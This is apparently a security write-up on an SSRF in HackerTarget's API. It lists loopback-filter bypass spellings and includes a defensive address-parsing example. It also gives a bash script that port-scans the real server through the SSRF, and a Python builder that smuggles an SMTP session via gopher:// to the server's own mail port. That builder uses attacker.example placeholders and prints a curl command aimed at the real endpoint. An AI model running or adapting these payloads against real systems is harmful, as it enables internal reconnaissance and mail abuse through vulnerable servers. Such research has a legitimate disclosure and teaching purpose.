Hacking the Hackers: Leveraging an SSRF in HackerTarget

This post summarizes how an SSRF in HackerTarget's API was leveraged to send email from the vulnerable server.

https://api.hackertarget.com/httpheaders/?q=<target>

Normally the target (the q parameter) is a third-party site such as example.com, but the researcher found that 127.0.0.1 was accepted as well, so the endpoint could be pointed at services listening on the API server itself.

Initial Fix

The fix only checked for the literal string 127.0.0.1, not for the address the string actually resolves to.

Bypass

0
127.00.1
127.0.01
0.00.0
0.0.00
127.1.0.1
127.10.1
127.1.01
0177.1
0177.0001.0001
0x0.0x0.0x0.0x0
0000.0000.0000.0000
0x7f.0x0.0x0.0x1
0177.0000.0000.0001
0177.0001.0000..0001
0x7f.0x1.0x0.0x1
0x7f.0x1.0x1
localtest.me
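The spellings above all work because the target's resolver (inet_aton-style parsing, or DNS for localtest.me) maps them to a loopback or unspecified address, while the string comparison does not. The following is an added example, not code from the original post or from HackerTarget: it parses hosts the way inet_aton(3) does (1 to 4 dot-separated parts, each decimal, octal with a leading 0, or hex with 0x, last part filling the remaining bytes) and decides on the resulting address instead of its spelling. STUB_DNS is a constructed stand-in for a resolver so the code runs offline; the function and constant names are the example's own. The double-dot entry from the list above is left out because it contains an empty part and is not a valid inet_aton form, so whether the fetcher accepted it cannot be shown here.

```python
"""Why 'block the string 127.0.0.1' fails: parse the host the way inet_aton(3)
does, then classify the resulting address rather than the spelling."""
import ipaddress
import re

# Bypass spellings from the list above (minus the invalid double-dot entry).
BYPASSES = [
    "0", "127.00.1", "127.0.01", "0.00.0", "0.0.00", "127.1.0.1", "127.10.1",
    "127.1.01", "0177.1", "0177.0001.0001", "0x0.0x0.0x0.0x0",
    "0000.0000.0000.0000", "0x7f.0x0.0x0.0x1", "0177.0000.0000.0001",
    "0x7f.0x1.0x0.0x1", "0x7f.0x1.0x1", "localtest.me",
]

# Constructed DNS stand-in so the example runs offline. localtest.me really does
# resolve to 127.0.0.1; the example.com entry is a TEST-NET placeholder.
# In production pass e.g. lambda h: socket.gethostbyname_ex(h)[2] instead, and
# connect to the IP you checked (not the name) to avoid DNS rebinding.
STUB_DNS = {"localtest.me": ["127.0.0.1"], "example.com": ["203.0.113.10"]}

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")          # a bare "0" is octal zero
_DEC = re.compile(r"[1-9][0-9]*")


def parse_inet_aton(text):
    """Return an IPv4Address for any form inet_aton(3) accepts, else None."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if _HEX.fullmatch(part):
            values.append(int(part, 16))
        elif _OCT.fullmatch(part):
            values.append(int(part, 8))
        elif _DEC.fullmatch(part):
            values.append(int(part, 10))
        else:
            return None
    *head, last = values
    # Every part but the last is one byte; the last fills the remaining bytes.
    if any(v > 0xFF for v in head):
        return None
    remaining = 4 - len(head)
    if last >= 1 << (8 * remaining):
        return None
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    addr = (addr << (8 * remaining)) | last
    return ipaddress.IPv4Address(addr)


def naive_block(host):
    """The 'initial fix' as the post describes it: match the literal string."""
    return host == "127.0.0.1"


RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(addr):
    """Loopback, 0.0.0.0 (connects to loopback on Linux), link-local
    (covers cloud metadata at 169.254.169.254) and RFC 1918 space."""
    return (addr.is_loopback or addr.is_unspecified or addr.is_link_local
            or any(addr in net for net in RFC1918))


def robust_block(host, resolve=STUB_DNS.get):
    """Decide on the address the host maps to, failing closed on unknown names."""
    addr = parse_inet_aton(host)
    if addr is not None:
        return is_internal(addr)
    ips = resolve(host) or []
    if not ips:
        return True
    return any(is_internal(ipaddress.ip_address(ip)) for ip in ips)


if __name__ == "__main__":
    for host in BYPASSES:
        print(f"{host:24} naive={naive_block(host)!s:5} robust={robust_block(host)}")
```

Every entry in BYPASSES slips past naive_block and is caught by robust_block; example.com and 203.0.113.10 pass both. The same parser also explains why "127.10.1" lands on 127.10.0.1 rather than 127.0.10.1: the final part fills whatever bytes are left.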

Automation

#!/usr/bin/env bash
# Usage: ./scan.sh <host>   (127.0.0.1 or any of the bypass spellings above)
# Drives the SSRF through ports 1-9999; the response reveals which ports answer.
target="$1"
[ -n "$target" ] || { echo "usage: $0 <host>" >&2; exit 1; }
for port in $(seq 1 9999); do
	echo -e "\n\n[+] Checking Port: ${port}\n"
	curl "https://api.hackertarget.com/httpheaders/?q=http://${target}:${port}" && echo -e "\n"
done

SMTP

After a round of scanning, port 25 turned out to be open. The fetcher also supports not only http:// and https:// but dict:// and gopher:// as well (see the Medium post for the other supported protocols).

That combination was used to send email through the server's own SMTP service.

In a nutshell, the path of a gopher:// URL is one character (the Gopher item type, which the client discards) followed by the selector; the client sends the selector verbatim and terminates it with CR+LF. Because CR+LF can be URL-encoded as %0d%0a inside the selector, a single gopher:// request can carry several lines, which is enough to script an entire SMTP session.
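To make the mechanism concrete, here is an added example (not code from the original post) that packs an SMTP session into one gopher:// URL and shows the bytes a gopher client such as curl would write to port 25. The HELO name, addresses and message text are placeholders, and the _ type character is a conventional choice, not something the post specifies. Real SMTP servers reply between commands; the payload simply sends everything at once and relies on the server tolerating that.

```python
"""Build a gopher:// URL that makes the SSRF target speak SMTP to itself."""
from urllib.parse import quote, unquote, urlsplit


def smtp_lines(helo, mail_from, rcpt_to, subject, body):
    """Lines of a minimal SMTP session; the body is dot-stuffed per RFC 5321."""
    message = [f"Subject: {subject}", ""]
    for line in body.splitlines():
        message.append("." + line if line.startswith(".") else line)
    return [
        f"HELO {helo}",
        f"MAIL FROM:<{mail_from}>",
        f"RCPT TO:<{rcpt_to}>",
        "DATA",
        *message,
        ".",      # end of DATA
        "QUIT",
    ]


def gopher_url(host, port, lines):
    """Pack lines into one gopher:// URL.

    Path = "/" + one type character + selector. The client drops the type
    character ("_" is conventional for raw payloads) and writes selector + CRLF
    to the socket, so CRLF encoded as %0D%0A inside the selector turns into
    real line breaks on the wire. safe="" also encodes "/", "?" and "#" so no
    part of the payload is reinterpreted as path, query or fragment.
    """
    selector = "\r\n".join(lines)
    return f"gopher://{host}:{port}/_" + quote(selector, safe="")


def wire_bytes(url):
    """What a gopher client sends for url: the selector followed by CRLF."""
    path = urlsplit(url).path          # "/_HELO%20..."
    selector = unquote(path[2:])       # drop "/" and the type character
    return (selector + "\r\n").encode()


def build_demo():
    """Placeholder session (constructed values) against the server's own port 25."""
    lines = smtp_lines("attacker.example", "ssrf@attacker.example",
                       "victim@example.com", "SSRF test", "Hello from gopher.")
    url = gopher_url("127.0.0.1", 25, lines)
    return url, wire_bytes(url)


if __name__ == "__main__":
    url, raw = build_demo()
    # The vulnerable endpoint from the post took the URL in its q parameter.
    print("curl 'https://api.hackertarget.com/httpheaders/?q=" + url + "'")
    print(raw.decode(), end="")
```

wire_bytes is the check worth running before firing anything: if the decoded bytes do not read as a clean SMTP transcript (one command per line, CRLF-terminated, a lone "." closing DATA), the URL encoding is wrong and the server will just see garbage.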
